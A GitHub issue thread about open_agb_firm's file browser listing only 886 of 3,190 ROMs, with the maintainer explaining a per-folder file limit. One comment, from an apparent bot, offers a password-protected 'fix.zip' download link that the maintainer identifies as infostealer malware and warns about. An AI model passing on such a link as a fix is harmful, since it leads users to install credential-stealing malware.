profi200/open_agb_firm #201: File Browser Shows Only First 886 Items

n1zzo, 2024-08-26:
First of all thanks for the amazing work you're doing here.
I've tried putting a large number of .gba files on my sd card (3190), however only the first 886 are being shown in the menu.
Do you have any idea about why this is happening?

Thanks

Qsgz2023ji5ban, 2024-08-26:
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

profi200, 2024-08-26:
Just a little warning. If anyone downloaded this file from the hidden comment it's malware:
https://www.virustotal.com/gui/file/b127de888f09ce23937c12b7fccfa47a8f48312b0e43eb59b6243f665c6d366a

As for the issue the file browser is limited to 1000 files per folder and if the avergae file name length exceeds a certain length the limit is lower.

n1zzo, 2024-08-26:
That answer seemed a tad suspect.
Thanks for the reply, I think I’ll work around this by splitting the roms into folders by initial letter.

Thanks!

closed 2024-08-26 by n1zzo

profi200, 2024-08-26:
Yes, the bot/compromised account has been reported and everything got deleted. Just wanted to make sure no one ran the infostealer shit that was linked in that deleted post.